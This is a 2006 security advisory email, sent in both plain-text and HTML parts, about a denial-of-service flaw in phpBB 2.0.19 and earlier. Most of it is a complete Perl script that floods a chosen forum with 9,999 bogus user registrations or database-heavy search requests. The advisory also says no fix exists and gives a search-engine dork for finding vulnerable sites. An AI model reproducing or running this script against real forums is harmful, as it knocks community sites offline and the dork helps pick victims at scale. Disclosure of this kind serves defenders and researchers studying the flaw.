------=_Part_22785_23101671.1138200225311
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline

------------------------------------------------------
HYSA-2006-001 h4cky0u.org Advisory 010
------------------------------------------------------
Date - Wed Jan 25 2006

TITLE:
======

phpBB 2.0.19 search.php and profile.php DoS Vulnerability

SEVERITY:
=========

High

SOFTWARE:
=========

phpBB 2.0.19 and prior

INFO:
=====

phpBB is a high powered, fully scalable, and highly customizable Open Source bulletin board package. phpBB has a user-friendly interface, a simple and straightforward administration panel, and a helpful FAQ. Based on the powerful PHP server language and your choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers, phpBB is the ideal free community solution for all web sites.

Support Website : http://www.phpbb.com

BUG DESCRIPTION:
================

The bug was originally found by HaCkZaTaN of NeoSecurityteam. The original exploit code can be found at -

http://h4cky0u.org/viewtopic.php?t=637

That code affected only versions up to phpBB 2.0.15. The exploit code has been recoded so that it affects the latest version too.

The bug resides in the following two scripts-

profile.php << By registering as many users as you can.
search.php << By searching in a way that the db cannot understand.
Proof Of Concept Code: =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D #!/usr/bin/perl ####################################### ## Recoded by: mix2mix and Elioni of http://ahg-khf.org ## And h4cky0u Security Forums (http://h4cky0u.org) ## Name: phpBBDoSReloaded ## Original Author: HaCkZaTaN of Neo Security Team ## Tested on phpBB 2.0.19 and earlier versions ## Ported to perl by g30rg3_x ## Date: 25/01/06 ####################################### use IO::Socket; ## Initialized X $x =3D 0; print q( phpBBDosReloaded - Originally NsT-phpBB DoS by HaCkZaTaN Recoded by Albanian Hackers Group & h4cky0u Security Forums=09 ); print q(Host |without-> http://www.| ); $host =3D <STDIN>; chop ($host); print q(Path |example-> /phpBB2/ or /| ); $pth =3D <STDIN>; chop ($pth); print q(Flood Type |1 =3D If Visual Confirmation is disabled, 2 =3D If Visual Confirmation is enabled| ); $type =3D <STDIN>; chop ($type); ## Tipi p=EBr regjistrim if($type =3D=3D 1){ ## User Loop for 9999 loops (enough for Flood xDDDD) while($x !=3D 9999) { ## Antari q=EB regjistrohet automatikisht=EB "X" $uname =3D "username=3DAHG__" . "$x"; ## Emaili q=EB regjistrohet ne baz=EBn "X" $umail =3D "&email=3DAHG__" . 
"$x"; $postit =3D "$uname"."$umail"."%40ahg-crew.org&new_password=3D0123456&passw= ord_confirm=3D0123456&icq=3D&aim=3DN%2FA&msn=3D&yim=3D&website=3D&location= =3D&occupation=3D&interests=3D&signature=3D&viewemail=3D0&hideonline=3D0&no= tifyreply=3D0¬ifypm=3D1&popup_pm=3D1&attachsig=3D1&allowbbcode=3D1&allow= html=3D0&allowsmilies=3D1&language=3Denglish&style=3D2&timezone=3D0&datefor= mat=3DD+M+d%2C+Y+g%3Ai+a&mode=3Dregister&agreed=3Dtrue&coppa=3D0&submit=3DS= ubmit"; $lrg =3D length $postit; my $sock =3D new IO::Socket::INET ( PeerAddr =3D> "$host", PeerPort =3D> "80", Proto =3D> "tcp", ); die "\nNuk mundem te lidhemi me hostin sepse =EBsht dosirat ose nuk egziston: $!\n" unless $sock; ## Sending Truth Socket The HTTP Commands For Register a User in phpBB Foru= ms print $sock "POST $pth"."profile.php HTTP/1.1\n"; print $sock "Host: $host\n"; print $sock "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*\n"; print $sock "Referer: $host\n"; print $sock "Accept-Language: en-us\n"; print $sock "Content-Type: application/x-www-form-urlencoded\n"; print $sock "Accept-Encoding: gzip, deflate\n"; print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n"; print $sock "Connection: Keep-Alive\n"; print $sock "Cache-Control: no-cache\n"; print $sock "Content-Length: $lrg\n\n"; print $sock "$postit\n"; close($sock); ## Print a "+" for every loop syswrite STDOUT, "+"; $x++; } ## Tipi 2-sh=EB p=EBr K=EBrkim(Flood) } elsif ($type =3D=3D 2){ while($x !=3D 9999) { ## Final Search String to Send $postit =3D "search_keywords=3DAlbanian+Hackers+Group+Proof+of+Concept+$x+&= search_terms=3Dany&search_author=3D&search_forum=3D-1&search_time=3D0&searc= h_fields=3Dmsgonly&search_cat=3D-1&sort_by=3D0&sort_dir=3DASC&show_results= =3Dposts&return_chars=3D200"; ## Posit Length $lrg =3D length $postit; ## Connect Socket with 
Variables Provided By User my $sock =3D new IO::Socket::INET ( PeerAddr =3D> "$host", PeerPort =3D> "80", Proto =3D> "tcp", ); die "\nThe Socket Can't Connect To The Desired Host or the Host is MayBe DoSed: $!\n" unless $sock; ## Sending Truth Socket The HTTP Commands For Send A BD Search Into phpBB Forums print $sock "POST $pth"."search.php?mode=3Dresults HTTP/1.1\n"; print $sock "Host: $host\n"; print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=3D0.9,text/plain= ;q=3D0.8,image/png,*/*;q=3D0.5\n"; print $sock "Referer: $host\n"; print $sock "Accept-Language: en-us\n"; print $sock "Content-Type: application/x-www-form-urlencoded\n"; print $sock "Accept-Encoding: gzip, deflate\n"; print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n"; print $sock "Connection: Keep-Alive\n"; print $sock "Cache-Control: no-cache\n"; print $sock "Content-Length: $lrg\n\n"; print $sock "$postit\n"; close($sock); ## Print a "+" for every loop syswrite STDOUT, "+"; ## Increment X in One for every Loop $x++; } }else{ ## STF??? Qfar=EB keni Shtypur die "Mund=EBsia nuk Lejohet +_-???\n"; } FIX: =3D=3D=3D=3D No fix available as of date. GOOGLEDORK: =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D "Powered by phpBB" CREDITS: =3D=3D=3D=3D=3D=3D=3D=3D - This vulnerability was discovered and researched by HaCkZaTaN of NeoSecurityteam. - Exploit recoded by mix2mix of [AHG-KHF] Security Team for the latest release of the script - Web : http://ahg-khf.org mail : webmaster at ahg-khf dot org - Co Researcher - h4cky0u of h4cky0u Security Forums. mail : h4cky0u at gmail dot com web : http://www.h4cky0u.org ORIGINAL ADVISORY: =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D http://www.h4cky0u.org/advisories/HYSA-2006-001-phpbb.txt -- http://www.h4cky0u.org (In)Security at its best... 
------=_Part_22785_23101671.1138200225311 Content-Type: text/html; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline <pre>------------------------------------------------------<br> HYSA-2= 006-001 <a href=3D"http://h4cky0u.org">h4cky0u.org</a> Advisory 010<br>----= --------------------------------------------------<br>Date - Wed Jan 25 200= 6 <br><br><br>TITLE:<br>=3D=3D=3D=3D=3D=3D<br><br>phpBB 2.0.19 search.php and= profile.php DOS Vulnerability<br><br><br>SEVERITY:<br>=3D=3D=3D=3D=3D=3D= =3D=3D=3D<br><br>High<br><br><br>SOFTWARE:<br>=3D=3D=3D=3D=3D=3D=3D=3D=3D<b= r><br>phpBB 2.0.19 and prior<br><br><br>INFO:<br> =3D=3D=3D=3D=3D<br><br>phpBB is a high powered, fully scalable, and highly = customizable <br>Open Source bulletin board package. phpBB has a user-frien= dly <br>interface, simple and straightforward administration panel, and <br= >helpful FAQ. Based on the powerful PHP server language and your=20 <br>choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers, <b= r>phpBB is the ideal free community solution for all web sites.<br><br>Supp= ort Website : <a href=3D"http://www.phpbb.com">http://www.phpbb.com</a><br> <br><br>BUG DESCRIPTION:<br>=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D<br><br>The bug was originally found by HaCkZaTaN of NeoSecurityteam. Th= e original exploit code can be found at -<br><br><a href=3D"http://h4cky0u.= org/viewtopic.php?t=3D637">http://h4cky0u.org/viewtopic.php?t=3D637 </a><br><br>This one affected only versions uptill phpBB 2.0.15. The exploi= t code has been recoded which affects the latest version too. 
The bug resid= es in the following two scripts-<br><br>profile.php << By registering= as many users as you can.=20 <br>search.php << By searching in a way that the db cannot understan= d.<br><br><br>Proof Of Concept Code:<br>=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D<br><br>#!/usr/bin/perl <br>##############= ######################### <br>## Recoded by: mix2mix and Elioni of=20 <a href=3D"http://ahg-khf.org">http://ahg-khf.org</a><br>## And h4cky0u S= ecurity Forums (<a href=3D"http://h4cky0u.org">http://h4cky0u.org</a>) <br>= ## Name: phpBBDoSReloaded<br>## Original Author: HaCkZaTaN of Neo Secur= ity Team=20 <br>## Tested on phpBB 2.0.19 and earlier versions<br>## Ported to perl= by g30rg3_x<br>## Date: 25/01/06<br>####################################= ### <br>use IO::Socket; <br><br>## Initialized X <br>$x =3D 0; <br><br>prin= t q( <br> phpBBDosReloaded - Originally NsT-phpBB DoS by HaCkZaTaN<br> Recoded= by Albanian Hackers Group &<br> h4cky0u Security Forums=09<br><br>); = <br>print q(Host |without-> <a href=3D"http://www.|">http://www.|</a> );= =20 <br>$host =3D <STDIN>; <br>chop ($host); <br><br>print q(Path |exampl= e-> /phpBB2/ or /| ); <br>$pth =3D <STDIN>; <br>chop ($pth); <br><= br>print q(Flood Type |1 =3D If Visual Confirmation is disabled, 2 =3D If V= isual Confirmation is enabled| );=20 <br>$type =3D <STDIN>; <br>chop ($type); <br><br>## Tipi p=EBr regjis= trim <br>if($type =3D=3D 1){ <br><br>## User Loop for 9999 loops (enough fo= r Flood xDDDD) <br>while($x !=3D 9999) <br>{ <br><br>## Antari q=EB regjist= rohet automatikisht=EB "X"=20 <br>$uname =3D "username=3DAHG__" . "$x"; <br><br>## Em= aili q=EB regjistrohet ne baz=EBn "X" <br>$umail =3D "&e= mail=3DAHG__" . 
"$x"; <br><br>$postit =3D "$uname"= ."$umail"."%40ahg- crew.org&new_password=3D0123456&password_confirm=3D0123456&icq= =3D&aim=3DN%2FA&msn=3D&yim=3D&website=3D&location=3D&am= p;occupation=3D&interests=3D&signature=3D&viewemail=3D0&hid= eonline=3D0&notifyreply=3D0&notifypm=3D1&popup_pm=3D1&attac= hsig=3D1&allowbbcode=3D1&allowhtml=3D0&allowsmilies=3D1&lan= guage=3Denglish&style=3D2&timezone=3D0&dateformat=3DD+M+d%2C+Y+= g%3Ai+a&mode=3Dregister&agreed=3Dtrue&coppa=3D0&submit=3DSu= bmit "; <br><br>$lrg =3D length $postit; <br><br>my $sock =3D new IO::Socke= t::INET ( <br> PeerAddr =3D> "$host= ", <br> PeerPort =3D> "80"= ;, <br> Proto =3D> "tcp", <br> = ); <br>die "\nNuk mundem te lidhemi me hostin= sepse =EBsht dosirat ose nuk egziston: $!\n" unless $sock; <br><br>##= Sending Truth Socket The HTTP Commands For Register a User in phpBB Forums= =20 <br>print $sock "POST $pth"."profile.php HTTP/1.1\n"; <= br>print $sock "Host: $host\n"; <br>print $sock "Accept: ima= ge/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-f= lash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/= msword, */*\n";=20 <br>print $sock "Referer: $host\n"; <br>print $sock "Accept-= Language: en-us\n"; <br>print $sock "Content-Type: application/x-= www-form-urlencoded\n"; <br>print $sock "Accept-Encoding: gzip, d= eflate\n";=20 <br>print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv= :1.7.8) Gecko/20050511 Firefox/1.0.4\n"; <br>print $sock "Connect= ion: Keep-Alive\n"; <br>print $sock "Cache-Control: no-cache\n&qu= ot;;=20 <br>print $sock "Content-Length: $lrg\n\n"; <br>print $sock "= ;$postit\n"; <br>close($sock); <br><br>## Print a "+" for ev= ery loop <br>syswrite STDOUT, "+"; <br><br>$x++; <br>} <br><br> ## Tipi 2-sh=EB p=EBr K=EBrkim(Flood) <br>} <br>elsif ($type =3D=3D 2){ <br= ><br>while($x !=3D 9999) <br>{ <br>## Final Search String to Send <br>$post= it =3D "search_keywords=3DAlbanian+Hackers+Group+Proof+of+Concept+$x+&= 
amp;search_terms=3Dany&search_author=3D&search_forum=3D-1&searc= h_time=3D0&search_fields=3Dmsgonly&search_cat=3D-1&sort_by=3D0&= amp;sort_dir=3DASC&show_results=3Dposts&return_chars=3D200";= =20 <br><br>## Posit Length <br>$lrg =3D length $postit; <br><br>## Connect Soc= ket with Variables Provided By User <br>my $sock =3D new IO::Socket::INET (= <br> PeerAddr =3D> "$host", <= br> PeerPort =3D> "80", <br> = Proto =3D> "tcp", <br> = ); <br>die "\nThe Socket Can't Connect To The Desi= red Host or the Host is MayBe DoSed: $!\n" unless $sock;=20 <br><br>## Sending Truth Socket The HTTP Commands For Send A BD Search Into= phpBB Forums <br>print $sock "POST $pth"."search.php?mode= =3Dresults HTTP/1.1\n"; <br>print $sock "Host: $host\n"; <br= > print $sock "Accept: text/xml,application/xml,application/xhtml+xml,te= xt/html;q=3D0.9,text/plain;q=3D0.8,image/png,*/*;q=3D0.5\n"; <br>print= $sock "Referer: $host\n"; <br>print $sock "Accept-Language:= en-us\n";=20 <br>print $sock "Content-Type: application/x-www-form-urlencoded\n&quo= t;; <br>print $sock "Accept-Encoding: gzip, deflate\n"; <br>print= $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8 ) Gecko/20050511 Firefox/1.0.4\n"; <br>print $sock "Connection: K= eep-Alive\n"; <br>print $sock "Cache-Control: no-cache\n"; <= br>print $sock "Content-Length: $lrg\n\n"; <br>print $sock "= $postit\n";=20 <br>close($sock); <br><br>## Print a "+" for every loop <br>syswr= ite STDOUT, "+"; <br><br>## Increment X in One for every Loop <br= >$x++; <br>} <br>}else{ <br>## STF??? Qfar=EB keni Shtypur <br> die "= ;Mund=EBsia nuk Lejohet +_-???\n";=20 <br>}<br><br><br>FIX:<br>=3D=3D=3D=3D<br><br>No fix available as of date.<b= r><br><br>GOOGLEDORK:<br>=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D<br><br>"Pow= ered by phpBB" <br><br><br>CREDITS:<br>=3D=3D=3D=3D=3D=3D=3D=3D<br><br= >- This vulnerability was discovered and researched by HaCkZaTaN of NeoSecu= rityteam. 
<br><br><br>- Exploit recoded by mix2mix of [AHG-KHF] Security Team for the= latest release of the script -<br><br>Web : <a href=3D"http://ahg-khf.org"= >http://ahg-khf.org</a><br><br>mail : webmaster at ahg-khf dot org<br><br> <br>- Co Researcher -<br><br>h4cky0u of h4cky0u Security Forums.<br><br>mai= l : h4cky0u at gmail dot com<br><br>web : <a href=3D"http://www.h4cky0u.org= ">http://www.h4cky0u.org</a><br><br><br>ORIGINAL ADVISORY:<br>=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D <br><br><a href=3D"http://www.h4cky0u.org/advisories/HYSA-2006-001-phpbb.tx= t">http://www.h4cky0u.org/advisories/HYSA-2006-001-phpbb.txt</a><br><br></p= re> -- <br><a href=3D"http://www.h4cky0u.org">http://www.h4cky0u.org</a><br>(In= )Security at its best... ------=_Part_22785_23101671.1138200225311--